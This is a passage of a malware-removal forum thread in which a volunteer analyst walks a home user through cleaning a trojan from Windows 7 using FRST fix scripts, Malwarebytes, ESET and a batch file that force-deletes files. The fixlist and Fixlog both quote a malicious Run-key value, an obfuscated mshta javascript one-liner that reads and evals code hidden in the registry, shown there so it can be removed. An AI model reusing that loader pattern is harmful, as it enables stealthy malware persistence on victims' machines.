Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:32 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:14:15 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:14:15 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:14:15 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:14:15 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.


Microsoft Office:
=========================
Error: (08/03/2015 07:43:15 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: firefox.exe39.0.0.5659ae001d0cdaf2253320240C:\Program Files (x86)\Mozilla Firefox\firefox.exea2b0bf1a-39aa-11e5-9c72-705ab677b1a1

Error: (07/29/2015 07:32:10 AM) (Source: ESENT) (EventID: 412) (User: )
Description: taskhost1568WebCacheLocal: C:\Users\Mom\AppData\Local\Microsoft\Windows\WebCache\V01.log-501

Error: (07/29/2015 07:32:10 AM) (Source: ESENT) (EventID: 412) (User: )
Description: taskhost1568WebCacheLocal: C:\Users\Mom\AppData\Local\Microsoft\Windows\WebCache\V01.log-501

Error: (07/26/2015 12:17:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: javaw.exe8.0.31.1354925fd3unknown0.0.0.000000000c00000920125287a119001d0c7943c7d0d46C:\Program Files (x86)\Java\jre1.8.0_31\bin\javaw.exeunknowndb940cb0-3387-11e5-9dfd-705ab677b1a1

Error: (07/06/2015 08:52:56 PM) (Source: MsiInstaller) (EventID: 11721) (User: Savage)
Description: Product: Java 8 Update 31 -- Error 1721. There is a problem with this Windows Installer package. A program required for this install to complete could not be run. Contact your support personnel or package vendor. Action: installexe, location: C:\Windows\Installer\MSIE4C6.tmp, command: INSTALLDIR="C:\Program Files (x86)\Java\jre1.8.0_31\\" REPAIRMODE=1 (NULL)(NULL)(NULL)(NULL)(NULL)

Error: (07/03/2015 09:50:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: uTorrent.exe3.4.3.40298ac801d0b5bc80f1a9c630C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe10c1ae94-21c5-11e5-9def-705ab677b1a1

Error: (06/28/2015 08:00:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: javaw.exe8.0.31.1354925fd3unknown0.0.0.000000000c000008e1500287a148c01d0b1d4a720e9d1C:\Program Files (x86)\Java\jre1.8.0_31\bin\javaw.exeunknownfd26a18f-1dc7-11e5-9af1-705ab677b1a1

Error: (06/28/2015 07:29:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Skype.exe7.5.0.102bb401d0b1d02f0a272631C:\Program Files (x86)\Skype\Phone\Skype.exea3dfe66a-1dc3-11e5-9af1-705ab677b1a1

Error: (06/25/2015 07:41:15 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: uTorrent.exe3.4.3.40298b7401d0af6515faa14730C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exeb632200e-1b69-11e5-8632-705ab677b1a1

Error: (06/25/2015 05:45:41 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: thunderbird.exe31.7.0.5605f6401d0af653934218340C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe8832c5c8-1b59-11e5-8632-705ab677b1a1


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i3 CPU M 330 @ 2.13GHz
Percentage of memory in use: 57%
Total physical RAM: 3893.58 MB
Available physical RAM: 1672.33 MB
Total Virtual: 7785.36 MB
Available Virtual: 5082.54 MB

==================== Drives ================================

Drive c: (WINDOWS) (Fixed) (Total:456.62 GB) (Free:357.52 GB) NTFS
Drive d: (Data) (Fixed) (Total:8.75 GB) (Free:1.03 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: C17AE81F)
Partition 1: (Active) - (Size=400 MB) - (Type=27)
Partition 2: (Not Active) - (Size=456.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=8.7 GB) - (Type=07 NTFS)

==================== End of log ============================
kkollage is offline  
Old 08-11-2015, 06:33 PM   #5
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello kkollage. You're welcome. Do you still use Soda PDF 6?

Quote:
I have a 4 disc set of ''product recovery'' - is that the same thing?
No, a repair disc is just one disc. You can always make one later, on any Win7 machine.

------------------------------------------------------
  • Open Notepad (Start > All Programs > Accessories > Notepad).
  • Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
  • Save it as fixlist.txt next to FRST64.exe
  • If asked to change 'Encoding:' to 'Unicode:', please agree and save it.

    NOTE: Both FRST64.exe and the fixlist.txt must be in the same location or the fix will not work.


    Code:
    start
    createrestorepoint:
    FirewallRules: [{5E0C6FF5-AA8A-4452-86E4-8B5C86D10E97}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{694FC7B7-0568-465B-A863-EC1D4891024F}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
    HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [**ac49aad3<*>] => mshta javascript:YKTfM8a="lesbPHGZt";N3x=new%20ActiveXObject("WScript.Shell");O9uceQw="FoIi";XULc3=N3x.RegRead("HKCU\\software\\89410848\\8f956f6e");YZC3oqT="kX";eval(XULc3);ttz9gHHS="gOskW"; <===== ATTENTION (Value Name with invalid characters)
    ShellIconOverlayIdentifiers: ["DropboxExt1"]         -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt2"]         -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt3"]         -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt4"]         -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt5"]         -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt6"]         -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt7"]         -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt8"]         -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: Soda PDF 6 -> C:\Program Files (x86)\Soda PDF 6\np-previewer.dll [No File]
    CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
    S1 MpKsl958ccaaf; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys [X]
    2015-08-08 21:08 - 2014-05-25 18:32 - 00000000 ____D C:\Users\Mom\AppData\Roaming\uTorrent
    EmptyTemp:
    end
  • Double-click FRST64 to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
  • Click the Fix button just once, and wait.
  • If you receive a message that a reboot is required, please make sure you allow it to restart normally.
  • The tool will complete its run after the restart.
  • When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-12-2015, 12:51 AM   #6
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi
I am stuck. I do not understand what this is:
save as fixlist.txt next to FRST64.exe
I followed directions and saved it in downloads. It appears to be near F...64 but not ''with'' it. Do I drag it to F...64 and then run that? (it prompts the window Do you want to allow...etc)
Please advise. I have to go to work now so will check back in about 8 hours.

Thank you very much
kkollage is offline  
Old 08-12-2015, 05:27 AM   #7
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're welcome. It only needs to be in the same folder as FRST64.exe. Just double-click FRST64.exe and click Fix after it downloads an updated version. Let me know if you still have trouble.
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-12-2015, 02:11 PM   #8
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Fix result of Farbar Recovery Scan Tool (x64) Version:11-08-2015 02
Ran by Mom (2015-08-12 21:21:09) Run:1
Running from C:\Users\Mom\Downloads
Loaded Profiles: Mom (Available Profiles: Mom)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
createrestorepoint:
FirewallRules: [{5E0C6FF5-AA8A-4452-86E4-8B5C86D10E97}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{694FC7B7-0568-465B-A863-EC1D4891024F}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [**ac49aad3<*>] => mshta javascript:YKTfM8a="lesbPHGZt";N3x=new%20ActiveXObject("WScript.Shell");O9uceQw="FoIi";XULc3=N3x.RegRead("HKCU\\software\\89410848\\8f956f6e");YZC3oqT="kX";eval(XULc3);ttz9gHHS="gOskW"; <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: Soda PDF 6 -> C:\Program Files (x86)\Soda PDF 6\np-previewer.dll [No File]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
S1 MpKsl958ccaaf; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys [X]
2015-08-08 21:08 - 2014-05-25 18:32 - 00000000 ____D C:\Users\Mom\AppData\Roaming\uTorrent
EmptyTemp:
end
*****************

Restore point was successfully created.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5E0C6FF5-AA8A-4452-86E4-8B5C86D10E97} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{694FC7B7-0568-465B-A863-EC1D4891024F} => value removed successfully
HKU\S-1-5-21-924763536-93737856-2869661127-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**ac49aad3<*> => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\Soda PDF 6" => key removed successfully
"HKLM\SOFTWARE\Google\Chrome\Extensions\flliilndjeohchalpbbcdekjklbdgfkk" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\flliilndjeohchalpbbcdekjklbdgfkk" => key removed successfully
MpKsl958ccaaf => service removed successfully
C:\Users\Mom\AppData\Roaming\uTorrent => moved successfully.
EmptyTemp: => 2.6 GB temporary data Removed.


The system needed a reboot..

==== End of Fixlog 21:38:40 ====

thank you
kkollage is offline  
Old 08-12-2015, 04:15 PM   #9
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're very welcome. How is the machine behaving? Is MSE still detecting the trojan?

Do you use Soda PDF 6?

------------------------------------------------------

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Double-click mbam-setup-2.1.8.1057.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish
  • At the end of the installation, a database update will be performed.
  • Click on Scan Now
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Remove Selected to allow MBAM to clean what was detected.
  • In most cases, a restart will be required and a prompt will be shown.
  • Wait for the prompt to restart the computer to appear, then click on Yes
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double-click on the Scan Log which shows the Date and Time of the scan just performed.
  • Click Export
  • Click Text file (*.txt)
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named File Saved should appear stating "Your file has been successfully exported".
  • Click Ok
  • Post that saved log in your next reply.
------------------------------------------------------

Your Java is out of date.

Java(TM) 8 Update 31 can be updated from the Java Control Panel. Go Start > Control Panel > Programs > Java (looks like a coffee cup) > Update Tab > Update Now. An update should begin; follow the prompts.

Make sure you untick the box next to whatever free program they prompt you to install, unless you want it. Also, let Java remove older versions if prompted.
  • After the install is complete, go back to your Control Panel and click the Java icon. (looks like a coffee cup)
    • On the General tab, under Temporary Internet Files, click the Settings button.
    • Next, click on the Delete Files button.
    • There are two options checked in the window to clear the cache - Leave BOTH Checked
      • Cached Applications and Applets
      • Trace and Log Files
    • Click OK on Delete Temporary Files Window.
      Note: This deletes ALL the Downloaded Cached Applications and Applets from the CACHE
    • Click OK to leave the Temporary Files Window.
    • Click OK to leave the Java Control Panel.
------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

In Microsoft Windows Vista/Win7, you must open the Web browser via a right-click using the Run as administrator command.

Go here and click 'Run ESET Online Scanner'.
  • If you are not using Internet Explorer, double-click esetsmartinstaller_enu.exe to install it, then click 'Run'.
  • Turn off the real-time scanner of any existing antivirus program while performing the online scan. Here's how
  • Tick the box next to YES, I accept the Terms of Use.
  • Click Start
  • If using Internet Explorer, allow the ActiveX control to install when asked.
  • Once the components have downloaded, tick the option Enable detection of potentially unwanted applications
  • Click on Advanced Settings
  • Make sure that the option Remove found threats is unticked.
  • Ensure these options are ticked:
    • Scan Archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Next to 'Current scan targets: Operating memory, Local drives', click the Change... button.
  • Tick all the boxes that correspond to your external/inserted drives.
  • Click Start
  • Wait for the scan to finish.
  • When the scan is done, if it shows a screen that says "Threats found!", click "List of found threats", and then click "Export to text file..."
  • Save that text file to your desktop, and then copy/paste the contents in your next reply.
------------------------------------------------------

Please post the following in your next reply:

MBAM log
ESET report
report on system behavior
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-13-2015, 11:00 AM   #10
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi chemist

I was able to get the MBAM log.
I got up to Go here and run ''ESET Online Scanner'' and get the link, check the agree box but then
I cannot run ESET online scanner. (I have a screenshot but fail to get it to print here.) The message is ''an add on for this failed to run'' and then I get a blank blue screen. No ActiveX or anything...

I await your advice. Thanks.
Attached Thumbnails
Click image for larger version

Name:	ESET message.jpg
Views:	316
Size:	111.1 KB
ID:	249809  
kkollage is offline  
Old 08-13-2015, 01:28 PM   #11
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. Use Firefox for the ESET scan, and download and run the esetsmartinstaller_enu.exe

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-14-2015, 02:23 AM   #12
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi chemist

Thanks, I have the scan results now. My son was kind enough to quickly create my tech forum account and send the first mail to you before he left on holiday. My IT skills are basic and i appreciate your help. The soda 6 came up as 2 of 3 threats, so there's our answer on that (I did not know I was using it). I have been using son's laptop since beginning this clean up and so I cannot report on how this one is running just yet. Here are results:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 13/08/2015
Scan Time: 08:58
Logfile: malware report.txt
Administrator: Yes

Version: 2.1.8.1057
Malware Database: v2015.08.13.02
Rootkit Database: v2015.08.06.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Mom

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 350267
Time Elapsed: 31 min, 43 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

C:\ProgramData\Soda PDF 6\Installation\adawareTb_3.4.0.3_Lav01.exe a variant of Win32/Toolbar.Visicom.A potentially unwanted application
C:\Users\All Users\Soda PDF 6\Installation\adawareTb_3.4.0.3_Lav01.exe a variant of Win32/Toolbar.Visicom.A potentially unwanted application
C:\Users\Mom\Downloads\uTorrent.exe a variant of Win32/OpenCandy.C potentially unsafe application

I await your instructions. Thank you.
kkollage is offline  
Old 08-14-2015, 02:29 AM   #13
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Ah - one thing I do notice is whenever I shut down windows tells me not to shut down, loading 1 of 1 updates. This has been going on with every shut down for a while (could it be part of the problem) Thanks.
kkollage is offline  
Old 08-14-2015, 09:55 AM   #14
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Also, no trojan detected in the quick scan now. :)
kkollage is offline  
Old 08-14-2015, 10:39 AM   #15
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're very welcome. Glad to hear it.

Use the machine as normal for another day or so and let me know how it behaves.

I don't think the update problem is related to the infection you had.

Go to Windows Update > View update history and see what KB is the problem.

------------------------------------------------------

In order to uninstall Soda PDF 6, do the following:

Press the Windows "logo" key and "R" key then copy/paste the following single-line command into the Run box and click OK:

sc delete LULU Software CrashHandler

A DOS window will open and close again, this is normal.

Repeat for this command:

sc delete Soda PDF 6

------------------------------------------------------

Press the Windows "logo" key and "R" key then copy/paste the following single-line command into the Run box and click OK:

MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

Follow the prompts to uninstall Soda PDF 6. If successful...

Open Notepad and copy/paste the entire contents of the codebox below into Notepad:

Code:
@echo off
if exist "%temp%\log.txt" del "%temp%\log.txt"

for %%g in (

"C:\Users\Mom\Downloads\uTorrent.exe"

) do (
del /a/f/q %%g >nul 2>&1
if exist %%g echo.%%~g>>"%temp%\log.txt"
)

for %%g in (

"C:\ProgramData\Soda PDF 6"
"C:\Users\All Users\Soda PDF 6"
"C:\Program Files (x86)\Soda PDF 6"

) do (
rd /s/q %%g >nul 2>&1
if exist %%g echo.%%~g>>"%temp%\log.txt"
)

if exist "%temp%\log.txt" ( start notepad "%temp%\log.txt"
) else echo.Deleted Successfully !!

pause
del %0
Save this Notepad file as fix.bat and choose to Save as type: - All Files to your desktop then close the Notepad file.
It should look like this:

Right-click on fix.bat and choose 'Run as administrator' to allow it to run.

Tell me what it says in your next reply. Press any key to continue.

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-14-2015, 12:55 PM   #16
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Can you please tell me how to install MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

Thanks
kkollage is offline  
Old 08-14-2015, 01:16 PM   #17
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



It is nice to learn where to look around the computer. I see in windows updates 2 programs fail to load, hence the retries at shut-down. They are as follows:

Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition

Installation date: ‎14/‎08/‎2015 20:56

Installation status: Failed

Error details: Code 80070663

Update type: Important

Microsoft has released an update for Microsoft Office 2010 32-Bit Edition. This update provides the latest fixes to Microsoft Office 2010 32-Bit Edition. Additionally, this update contains stability and performance improvements.

More information:
https://support.microsoft.com/kb/2553347

Help and Support:
https://support.microsoft.com/?LN=en-us

and

Upgrade to Windows 10 Pro

Installation date: ‎14/‎08/‎2015 20:53

Installation status: Failed

Error details: Code 80240020

Update type: Important

Install the next version of Windows.

More information:
Before you install Windows Insider Preview - Microsoft Windows

Help and Support:
https://go.microsoft.com/fwlink/?LinkId=507417

What are your views on this?

Thank you.
kkollage is offline  
Old 08-14-2015, 05:47 PM   #18
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're very welcome.

You're not installing MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

We're using that command to start the uninstall wizard for Soda PDF 6.

Again, press the Windows "logo" key and "R" key then copy/paste the following bolded command into the Run box and click OK:

MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

Follow the prompts to uninstall Soda PDF 6.

------------------------------------------------------

If Soda PDF 6 uninstalled successfully...

Open Notepad and copy/paste the entire contents of the codebox below into Notepad:

Code:
@echo off
if exist "%temp%\log.txt" del "%temp%\log.txt"

for %%g in (

"C:\Users\Mom\Downloads\uTorrent.exe"

) do (
del /a/f/q %%g >nul 2>&1
if exist %%g echo.%%~g>>"%temp%\log.txt"
)

for %%g in (

"C:\ProgramData\Soda PDF 6"
"C:\Users\All Users\Soda PDF 6"
"C:\Program Files (x86)\Soda PDF 6"

) do (
rd /s/q %%g >nul 2>&1
if exist %%g echo.%%~g>>"%temp%\log.txt"
)

if exist "%temp%\log.txt" ( start notepad "%temp%\log.txt"
) else echo.Deleted Successfully !!

pause
del %0
Save this Notepad file as fix.bat and choose to Save as type: - All Files to your desktop then close the Notepad file.
It should look like this:

Right-click on fix.bat and choose 'Run as administrator' to allow it to run.

Tell me what it says in your next reply. Press any key to continue.

------------------------------------------------------

As far as the Windows 10 update, don't install that until we are done here.

Download the Office update from here:

Download Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition from Official Microsoft Download Center

Save it to your desktop, run it, and follow the prompts. Let me know if it installed successfully.

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-15-2015, 12:28 AM   #19
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi chemist
Windows Installer -
The copy and paste of the commands se Delete LULU, se Delete Soda PDF 6 and MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70} do not remain in bold type when pasted to the Windows installer box.
With the 'de Delete...' prompts a screen flashes on/off but so fast I cannot see what it is (maybe this is correct?);
the MsiExec... brings up a warning ' X This action is only valid for products that are currently installed '

Thanks.
kkollage is offline  
Old 08-15-2015, 07:25 AM   #20
Security Team
Moderator, Analyst
